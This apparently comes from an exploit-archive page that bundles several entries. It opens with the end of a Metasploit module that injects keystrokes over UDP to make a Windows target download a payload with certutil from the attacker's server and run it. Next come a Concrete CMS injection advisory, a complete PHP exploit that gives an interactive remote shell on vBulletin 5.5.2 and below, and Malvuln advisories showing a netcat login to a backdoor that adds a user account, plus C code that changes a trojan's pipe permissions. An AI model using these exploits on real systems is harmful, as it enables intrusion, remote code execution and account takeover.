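  # Protocol prefix for "special" (non-character) keys.
  def special_key_header
    "\x7f\x15\x02"
  end

  # Protocol prefix for a single typed character.
  def key_header
    "\x7f\x15\x01"
  end

  # Taps the Windows key to bring up the Start menu search box, then waits
  # SLEEP seconds. The two datagrams differ only in the flag byte; the up/down
  # labels are the original author's and have not been re-verified here.
  def windows_key
    udp_sock.put("#{special_key_header}\x01\x00\x00\x00\xab") # key up
    udp_sock.put("#{special_key_header}\x00\x00\x00\x00\xab") # key down
    sleep(datastore['SLEEP'])
  end

  # Sends Enter, then waits SLEEP seconds for the target to act on it.
  def enter_key
    udp_sock.put("#{special_key_header}\x01\x00\x00\x00\x42")
    sleep(datastore['SLEEP'])
  end

  # Types +command+ one character per datagram, then presses Enter and waits
  # another SLEEP seconds. The per-keystroke pause is a tenth of SLEEP;
  # fdiv keeps it fractional (SLEEP is an OptInt, so integer division would
  # make the pause 0 for the default of 1 and risk dropped or reordered keys).
  def send_command(command)
    command.each_char do |c|
      udp_sock.put("#{key_header}#{c}")
      sleep(datastore['SLEEP'].fdiv(10))
    end
    enter_key
    sleep(datastore['SLEEP'])
  end

  # Active check: runs the full typing sequence but serves a random blob
  # instead of a payload and deletes it again. Vulnerable iff the target
  # fetched the file from our HTTP server. The verdict is read as soon as
  # upload_file returns, so it relies on the callback arriving during the
  # SLEEP waits; a slow target can produce a false Safe. Like exploit, this
  # causes visible screen activity and a short-lived file on the target.
  def check
    @check_run = true
    @check_success = false
    upload_file
    return Exploit::CheckCode::Vulnerable if @check_success

    Exploit::CheckCode::Safe
  end

  # HTTP handler: records that the target called back and answers any request
  # with random bytes during a check, or with the generated payload EXE
  # otherwise.
  def on_request_uri(cli, _req)
    @check_success = true
    body = @check_run ? Rex::Text.rand_text_alphanumeric(rand(8..17)) : generate_payload_exe
    send_response(cli, body)
    print_good("Request received, sending #{body.length} bytes")
  end

  # Drives the target: wake the screen, open cmd.exe via Start search, fetch
  # a file with certutil from our web service, then delete it (check) or run
  # it (exploit). The staged file name is random and only gets an .exe
  # extension when it is going to be executed.
  def upload_file
    connect_udp
    # send a space character to skip any screensaver
    udp_sock.put("#{key_header} ")
    print_status('Connecting and Sending Windows key')
    windows_key

    print_status('Opening command prompt')
    send_command('cmd.exe')

    filename = Rex::Text.rand_text_alphanumeric(rand(8..17))
    filename << '.exe' unless @check_run
    # full path of the staged file on the target; previously the file name was
    # missing from these commands, so certutil/del/exec all targeted PATH itself
    staged = "#{path}#{filename}"
    if @service_started.nil?
      print_status('Starting up our web service...')
      start_service('Path' => '/')
      @service_started = true
    end
    send_command("certutil.exe -urlcache -f http://#{srvhost_addr}:#{srvport}/ #{staged}")
    if @check_run == false
      # real run (exploit): remove the dropped binary when the session ends
      register_file_for_cleanup(staged)
      print_status('Executing payload')
      send_command("#{staged} && exit")
    else
      # check (true) or never set (nil): just remove the probe file again
      send_command("del #{staged} && exit")
    end
    disconnect_udp
  end

  # Entry point: flags a real run so upload_file serves and executes the payload.
  def exploit
    @check_run = false
    upload_file
  end
end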
<pre><code>## Title: concretecms-9.1.3 Xpath injection<br />## Author: nu11secur1ty<br />## Date: 11.28.2022<br />## Vendor: https://www.concretecms.org/<br />## Software: https://www.concretecms.org/download<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3<br /><br />## Description:<br />The author reports the URL path segment `3` (the `ccm...` segment in the request below) as vulnerable to XPath injection: the test payload 50539478' or 4591=4591-- was submitted in that path segment and the server answered with an error page. The author further claims the request can be repeated to flood the system until the absolute paths of all content stored on the server are disclosed.<br />Reviewer note: the response reproduced below is a PHP include() failure (Whoops\Exception\ErrorException) raised while the Stash file-cache driver loads a translation cache entry during page rendering; no XPath evaluation appears anywhere in the stack trace, and whether the injected path segment influences the cache key is not visible from it. What the evidence supports is an unhandled exception returning HTTP 500 with a full debug stack trace that discloses absolute filesystem paths (verbose error output enabled on the tested install). Treat the "XPath injection" classification and the HIGH rating as unconfirmed.<br /><br />## STATUS: HIGH Vulnerability (claimed; see reviewer note above)<br /><br />[+] Exploits:<br />00:<br />```GET<br />GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js<br />HTTP/1.1<br />Host: pwnedhost.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />Content-Length: 0<br />```<br /><br />[+] Response:<br /><br />```HTTP<br />HTTP/1.1 500 Internal Server Error<br />Date: Mon, 28 Nov 2022 15:32:22 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Powered-By: PHP/7.4.30<br />Connection: close<br />Content-Type: text/html;charset=UTF-8<br />Content-Length: 592153<br /><br 
/><!DOCTYPE html><!--<br /><br /><br />Whoops\Exception\ErrorException: include(): Failed opening<br />'C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/application/files/cache/expensive\0fea6a13c52b4d47\25368f24b045ca84\38a865804f8fdcb6\57cd99682e939275\3e7d68124ace5663\5a578007c2573b03\d35376a9b3047dec\fee81596e3895419.php'<br />for inclusion (include_path='C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/concrete/vendor;C:\xampp\php\PEAR')<br />in file C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php<br />on line 26<br />Stack trace:<br /> 1. Whoops\Exception\ErrorException->()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26<br /> 2. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26<br /> 3. Stash\Driver\FileSystem\NativeEncoder->deserialize()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem.php:201<br /> 4. Stash\Driver\FileSystem->getData()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:631<br /> 5. Stash\Item->getRecord()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:321<br /> 6. Stash\Item->executeGet()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:252<br /> 7. Stash\Item->get()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:346<br /> 8. Stash\Item->isMiss()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Cache\Adapter\LaminasCacheDriver.php:67<br /> 9. Concrete\Core\Cache\Adapter\LaminasCacheDriver->internalGetItem()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-cache\src\Storage\Adapter\AbstractAdapter.php:356<br /> 10. 
Laminas\Cache\Storage\Adapter\AbstractAdapter->getItem()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:601<br /> 11. Laminas\I18n\Translator\Translator->loadMessages()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:434<br /> 12. Laminas\I18n\Translator\Translator->getTranslatedMessage()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:349<br /> 13. Laminas\I18n\Translator\Translator->translate()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Localization\Translator\Adapter\Laminas\TranslatorAdapter.php:69<br /> 14. Concrete\Core\Localization\Translator\Adapter\Laminas\TranslatorAdapter->translate()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\bootstrap\helpers.php:27<br /> 15. t() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\blocks\top_navigation_bar\view.php:47<br /> 16. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Block\View\BlockView.php:267<br /> 17. Concrete\Core\Block\View\BlockView->renderViewContents()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164<br /> 18. Concrete\Core\View\AbstractView->render()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\Area.php:853<br /> 19. Concrete\Core\Area\Area->display()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\GlobalArea.php:128<br /> 20. Concrete\Core\Area\GlobalArea->display()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\elements\header.php:11<br /> 21. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:125<br /> 22. Concrete\Core\View\View->inc()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\view.php:4<br /> 23. 
include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:329<br /> 24. Concrete\Core\View\View->renderTemplate()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:291<br /> 25. Concrete\Core\View\View->renderViewContents()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164<br /> 26. Concrete\Core\View\AbstractView->render()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\controllers\single_page\page_not_found.php:19<br /> 27. Concrete\Controller\SinglePage\PageNotFound->view()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318<br /> 28. call_user_func_array()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318<br /> 29. Concrete\Core\Controller\AbstractController->runAction()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:188<br /> 30. Concrete\Core\Http\ResponseFactory->controller()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:95<br /> 31. Concrete\Core\Http\ResponseFactory->notFound()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:390<br /> 32. Concrete\Core\Http\ResponseFactory->collectionNotFound()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:234<br /> 33. Concrete\Core\Http\ResponseFactory->collection()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:132<br /> 34. Concrete\Core\Http\DefaultDispatcher->handleDispatch()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:60<br /> 35. Concrete\Core\Http\DefaultDispatcher->dispatch()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\DispatcherDelegate.php:39<br /> 36. 
Concrete\Core\Http\Middleware\DispatcherDelegate->next()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\FrameOptionsMiddleware.php:39<br /> 37. Concrete\Core\Http\Middleware\FrameOptionsMiddleware->process()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50<br /> 38. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\StrictTransportSecurityMiddleware.php:36<br /> 39. Concrete\Core\Http\Middleware\StrictTransportSecurityMiddleware->process()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50<br /> 40. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ContentSecurityPolicyMiddleware.php:36<br /> 41. Concrete\Core\Http\Middleware\ContentSecurityPolicyMiddleware->process()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50<br /> 42. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\CookieMiddleware.php:35<br /> 43. Concrete\Core\Http\Middleware\CookieMiddleware->process()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50<br /> 44. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ApplicationMiddleware.php:29<br /> 45. Concrete\Core\Http\Middleware\ApplicationMiddleware->process()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50<br /> 46. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareStack.php:86<br /> 47. 
Concrete\Core\Http\Middleware\MiddlewareStack->process()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultServer.php:85<br /> 48. Concrete\Core\Http\DefaultServer->handleRequest()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\Run\DefaultRunner.php:125<br /> 49. Concrete\Core\Foundation\Runtime\Run\DefaultRunner->run()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\DefaultRuntime.php:102<br /> 50. Concrete\Core\Foundation\Runtime\DefaultRuntime->run()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\dispatcher.php:45<br /> 51. require() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\index.php:2<br /><br /><br />--><html><br /> <head><br /> <meta charset="utf-8"><br /> <meta name="robots" content="noindex,nofollow"/><br /> <meta name="viewport" content="width=device-width,<br />initial-scale=1, shrink-to-fit=no"/><br /> <title>Concrete CMS has encountered an issue.</title><br /><br /> <style>body {<br /> font: 12px "Helvetica Neue", helvetica, arial, sans-serif;<br /> color: #131313;<br /> background: #eeeeee;<br /> padding:0;<br /> margin: 0;<br /> max-height: 100%;<br /><br /> text-rendering: optimizeLegibility;<br />}<br /> a {<br /> text-decoration: none;<br /> }<br /><br />.Whoops.container {<br /> position: relative;<br /> z-index: 9999999999;<br />}<br /><br />.panel {<br /> overflow-y: scroll;<br /> height: 100%;<br /> position: fixed;<br /> margin: 0;<br /> left: 0;<br /> top: 0;<br />}<br /><br />.branding {<br /> position: absolute;<br /> top: 10px;<br /> right: 20px;<br /> color: #777777;<br /> font-size: 10px;<br /> z-index: 100;<br />}<br /> .branding a {<br /> color: #e95353;<br /> }<br /><br />header {<br /> color: white;<br /> box-sizing: border-box;<br /> background-color: #2a2a2a;<br /> padding: 35px 40px;<br /> max-height: 180px;<br /> overflow: hidden;<br /> transition: 0.5s;<br />}<br /><br /> header.header-expand {<br /> max-height: 
1000px;<br /> }<br /><br /> .exc-title {<br /> margin: 0;<br /> color: #bebebe;<br /> font-size: 14px;<br /> }<br /> .exc-title-primary, .exc-title-secondary {<br /> color: #e95353;<br /> }<br /><br /> .exc-message {<br /> font-size: 20px;<br /> word-wrap: break-word;<br /> margin: 4px 0 0 0;<br /> color: white;<br /> }<br /> .exc-message span {<br /> display: block;<br /> }<br /> .exc-message-empty-notice {<br /> color: #a29d9d;<br /> font-weight: 300;<br /> }<br /><br />.......<br /><br />```<br /><br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/4f60ka)<br /><br />## Time spent<br />`03:00:00`<br /><br /><br /></code></pre>
<pre><code><?php<br /><br />/*<br /> --------------------------------------------------------------<br /> vBulletin <= 5.5.2 (movepm) PHP Object Injection Vulnerability<br /> --------------------------------------------------------------<br /> <br /> author..............: Egidio Romano aka EgiX<br /> mail................: n0b0d13s[at]gmail[dot]com<br /> software link.......: https://www.vbulletin.com<br /> <br /> +-------------------------------------------------------------------------+<br /> | This proof of concept code was written for educational purpose only. |<br /> | Use it at your own risk. Author will be not responsible for any damage. |<br /> +-------------------------------------------------------------------------+<br /> <br /> [-] Vulnerability Description:<br /> <br /> User input passed through the "messageids" request parameter to /ajax/api/vb4_private/movepm is<br /> not properly sanitized before being used in a call to the unserialize() PHP function. This can<br /> be exploited by malicious users to inject arbitrary PHP objects into the application scope,<br /> allowing them to carry out a variety of attacks, such as executing arbitrary PHP code.<br /> <br /> [-] Technical writeup:<br /><br /> http://karmainsecurity.com/exploiting-an-nday-vbulletin-php-object-injection<br />*/<br /><br />set_time_limit(0);<br />error_reporting(E_ERROR);<br /><br />if (!extension_loaded("curl")) die("[+] cURL extension required!\n");<br /><br />print "+------------------------------------------------------------------+";<br />print "\n| vBulletin <= 5.5.2 (movepm) PHP Object Injection Exploit by EgiX |";<br />print "\n+------------------------------------------------------------------+\n";<br /><br />if ($argc != 4)<br />{<br /> print "\nUsage......: php $argv[0] <URL> <Username> <Password>\n";<br /> print "\nExample....: php $argv[0] http://localhost/vb/ user passwd";<br /> print "\nExample....: php $argv[0] https://vbulletin.com/ evil hacker\n\n";<br /> die();<br 
/>}<br /><br />class googlelogin_vendor_autoload {} // fake class to include the autoloader<br /><br />class GuzzleHttp_HandlerStack<br />{<br /> private $handler, $stack;<br /> <br /> function __construct($cmd)<br /> {<br /> $this->stack = [["system"]]; // the callback we want to execute<br /> $this->handler = $cmd; // argument for the callback<br /> }<br />}<br /><br />class GuzzleHttp_Psr7_FnStream<br />{<br /> function __construct($callback)<br /> {<br /> $this->_fn_close = $callback;<br /> }<br />}<br /><br />function make_popchain($cmd)<br />{<br /> $pop = new GuzzleHttp_HandlerStack($cmd);<br /> $pop = new GuzzleHttp_Psr7_FnStream([$pop, 'resolve']);<br /><br /> $chain = serialize([new googlelogin_vendor_autoload, $pop]);<br /><br /> $chain = str_replace(['s:', chr(0)], ['S:', '\00'], $chain);<br /> $chain = str_replace('GuzzleHttp_HandlerStack', 'GuzzleHttp\HandlerStack', $chain);<br /> $chain = str_replace('GuzzleHttp_Psr7_FnStream', 'GuzzleHttp\Psr7\FnStream', $chain);<br /> $chain = str_replace('0GuzzleHttp\HandlerStack', '0GuzzleHttp\5CHandlerStack', $chain);<br /> <br /> return $chain;<br />}<br /><br />list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];<br /><br />$ch = curl_init();<br /><br />curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<br />curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br />curl_setopt($ch, CURLOPT_HEADER, true);<br /><br />print "[+] Logging in with username '{$user}' and password '{$pass}'\n";<br /><br />curl_setopt($ch, CURLOPT_URL, $url);<br /><br />if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[+] Session ID not found!\n");<br /><br />curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=auth/login");<br />curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);<br />curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$user}&password={$pass}");<br /><br />if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[+] Login failed!\n");<br /><br />print "[+] Logged-in! 
Retrieving security token\n";<br /><br />curl_setopt($ch, CURLOPT_URL, $url);<br />curl_setopt($ch, CURLOPT_POST, false);<br />curl_setopt($ch, CURLOPT_HEADER, false);<br />curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);<br /><br />if (!preg_match('/token": "([^"]+)"/', curl_exec($ch), $token)) die("[+] Security token not found!\n");<br /><br />$params = ["routestring" => "ajax/api/vb4_private/movepm",<br /> "securitytoken" => $token[1],<br /> "folderid" => 1];<br /><br />print "[+] Launching shell\n";<br /><br />while(1)<br />{<br /> print "\nvb-shell# ";<br /> if (($cmd = trim(fgets(STDIN))) == "exit") break;<br /> $params["messageids"] = make_popchain($cmd);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));<br /> preg_match('/(.*){"response":/s', curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n");<br />}<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/4262a8b52b902aa2e6bf02a156d1b8d4.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br />Backup media: infosec.exchange/@malvuln<br /><br />Threat: Backdoor.Win32.Autocrat.b<br />Vulnerability: Weak Hardcoded Credentials<br />Description: The malware is packed with PeCompact, listens on TCP port 8536 and requires authentication. However, the password "autocrat" is weak and hardcoded within the PE file. Unpacking the executable, easily reveals the cleartext password.<br />Family: Autocrat<br />Type: PE32<br />MD5: 4262a8b52b902aa2e6bf02a156d1b8d4<br />Vuln ID: MVID-2022-0660<br />Dropped files: srvsupp.exe<br />Disclosure: 11/24/2022<br /><br /><br />Exploit/PoC:<br />C:\Users\gg\Desktop>nc64.exe x.x.x.x 8536<br />Login:autocrat<br /><br />WinShell v5.0 (C)2002 janker.org<br /><br />? for help<br />CMD>?<br /><br />i Install<br />r Remove<br />p Path<br />b reBoot<br />d shutDown<br />s Shell<br />x eXit<br />q Quit<br /><br />Download:<br />CMD>http://.../srv.exe<br /><br />? for help<br />CMD>s<br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\Users\Victim\Desktop>whoami<br />whoami<br />desktop-2c3iqho\victim<br /><br />C:\Users\Victim\Desktop>net user apparitionsec 666 /add<br />net user apparitionsec 666 /add<br />The command completed successfully.<br /><br /><br />C:\Users\Victim\Desktop><br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. 
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/99e55ce93392068c970384ab24a0e13d.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br />Backup media: infosec.exchange/@malvuln<br /><br />Threat: Win32.Ransom.Conti<br />Vulnerability: Crypto Logic Flaw<br />Description: Conti ransomware FAILS to encrypt non-PE files that have a ".exe" in the filename. Creating specially crafted file names successfully evaded encryption for this malware sample; other variants are unknown as they have not yet been tested.<br /><br />E.g. <br /><br />Test.exe.docx<br />Test.exe.pdf<br /><br />Tested successfully in a virtual machine environment.<br /><br />Family: Conti<br />Type: PE32<br />MD5: 99e55ce93392068c970384ab24a0e13d<br />Vuln ID: MVID-2022-0662<br />Disclosure: 11/25/2022<br /><br />Video PoC URL:<br />https://www.youtube.com/watch?v=rjxCII_e6xQ<br /><br />Exploit/PoC:<br />Create files with ".exe" within the filename.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. 
All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/d891c9374ccb2a4cae2274170e8644d8.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br />Backup media: infosec.exchange/@malvuln<br /><br />Threat: Trojan.Win32.DarkNeuron.gen<br />Vulnerability: Named Pipe Null DACL<br />Family: DarkNeuron (Turla Group)<br />Type: PE32<br />MD5: d891c9374ccb2a4cae2274170e8644d8<br />Vuln ID: MVID-2022-0661<br />Disclosure: 11/24/2022<br />Description: The malware process "NCSC.exe" creates an IPC pipe with a NULL DACL allowing RW for the Everyone user group.<br /><br />\\.\Pipe\Winsock2\baseapi_http<br /> RW Everyone<br /> RW BUILTIN\Administrators<br /><br />Local low privileged users can modify the DACL to remove rights for the Everyone users group, denying access to use the pipe for further RW interprocess communications.<br /><br />Exploit/PoC:<br />#include "windows.h"<br />#include "stdio.h"<br />#include "accctrl.h"<br />#include "aclapi.h"<br /><br />/*<br />Trojan.Win32.DarkNeuron.gen (Turla Group) NCSC.exe<br />MD5: d891c9374ccb2a4cae2274170e8644d8<br />NamedPipe Exploit Deny Access to Everyone<br />By Malvuln <br />Nov of 2022<br />**/<br /><br />#define VULN_TROJAN_PIPE "\\\\.\\pipe\\Winsock2\\baseapi_http"<br /><br />int main(void){<br /><br /> HANDLE hPipe = CreateFileA((LPCSTR)VULN_TROJAN_PIPE, GENERIC_WRITE | WRITE_DAC, 0, NULL, OPEN_EXISTING, NULL, NULL);<br /> PACL pOldDACL = NULL;<br /> PACL pNewDACL = NULL;<br /> <br />if (hPipe == INVALID_HANDLE_VALUE){ <br /> printf("%d", GetLastError()); <br /> return 1;<br />}<br /> <br /> if(GetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS){<br /> printf("%d", GetLastError());<br /> return 1;<br /> }<br /> <br /> TRUSTEE trustee[1];<br /> trustee[0].TrusteeForm = TRUSTEE_IS_NAME;<br /> trustee[0].TrusteeType = TRUSTEE_IS_GROUP;<br /> trustee[0].ptstrName = 
TEXT("Everyone");<br /> trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;<br /> trustee[0].pMultipleTrustee = NULL;<br /><br /> EXPLICIT_ACCESS explicit_access_list[1];<br /> ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));<br /><br /> explicit_access_list[0].grfAccessMode = DENY_ACCESS; <br /> explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;<br /> explicit_access_list[0].grfInheritance = NO_INHERITANCE;<br /> explicit_access_list[0].Trustee = trustee[0];<br /> <br /> if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){<br /> printf("%d", GetLastError());<br /> return 1;<br /> }<br /> <br /> if(SetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){ <br /> printf("%d", GetLastError());<br /> return 1; <br /> }else{<br /> printf("Trojan.Win32.DarkNeuron.gen (Turla Group) PWNED!\n");<br /> printf("By Malvuln\n");<br /> printf("Nov of 2022\n");<br /> }<br /> <br /> LocalFree(pNewDACL);<br /> LocalFree(pOldDACL);<br /> CloseHandle(hPipe);<br /><br /> system("pause");<br /><br />return 0;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. 
The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>